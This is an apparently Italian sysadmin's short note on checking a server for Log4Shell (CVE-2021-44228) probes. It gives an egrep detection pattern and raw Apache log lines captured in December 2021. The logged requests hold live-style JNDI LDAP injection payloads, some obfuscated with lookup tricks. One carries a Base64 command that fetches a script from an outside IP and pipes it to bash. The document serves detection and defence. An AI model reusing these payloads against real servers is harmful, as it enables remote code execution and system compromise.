rapido controllo su un server....il problema decisamente esiste
stringa di scansione dei log (ripresa da qui)
egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log
questo il risultato...la cosa interessante e' che vi sono diverse tipologie di codici di cui si tenta l'esecuzione
/var/log/apache2/access.log.1:167.71.13.196 - - [11/Dec/2021:10:04:25 +0100] "GET /$%7Bjndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b%7D?${jndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b}=${jndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b} HTTP/1.1" 404 515 "-" "${jndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b}"
/var/log/apache2/access.log.1:167.71.13.196 - - [11/Dec/2021:18:32:33 +0100] "GET /$%7Bjndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b%7D?${jndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b}=${jndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b} HTTP/1.1" 404 515 "-" "${jndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b}"
/var/log/apache2/access.log.1:194.163.163.20 - - [11/Dec/2021:22:13:07 +0100] "GET /?x=${jndi:ldap://${hostName}.c6qgldh5g22l07bu1lvgcg4tesaybpakh.interactsh.com/a} HTTP/1.1" 200 3343 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qgldh5g22l07bu1lvgcg4tesaybpakh.interactsh.com}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qgldh5g22l07bu1lvgcg4tesaybpakh.interactsh.com}"
/var/log/apache2/access.log.1:147.182.216.21 - - [12/Dec/2021:00:35:18 +0100] "GET / HTTP/1.1" 200 3324 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
/var/log/apache2/access.log.1:45.155.205.233 - - [12/Dec/2021:06:21:38 +0100] "GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNTAuMjE3LjczLjEwODo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xNTAuMjE3LjczLjEwODo4MCl8YmFzaA==} HTTP/1.1" 200 3343 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNTAuMjE3LjczLjEwODo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xNTAuMjE3LjczLjEwODo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNTAuMjE3LjczLjEwODo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xNTAuMjE3LjczLjEwODo4MCl8YmFzaA==}"
/var/log/apache2/access.log.1:107.189.29.181 - - [19/Dec/2021:15:19:44 +0100] "GET / HTTP/1.1" 200 3343 "-" "${jndi:ldap://179.43.175.101:1389/jedmdg}" botnet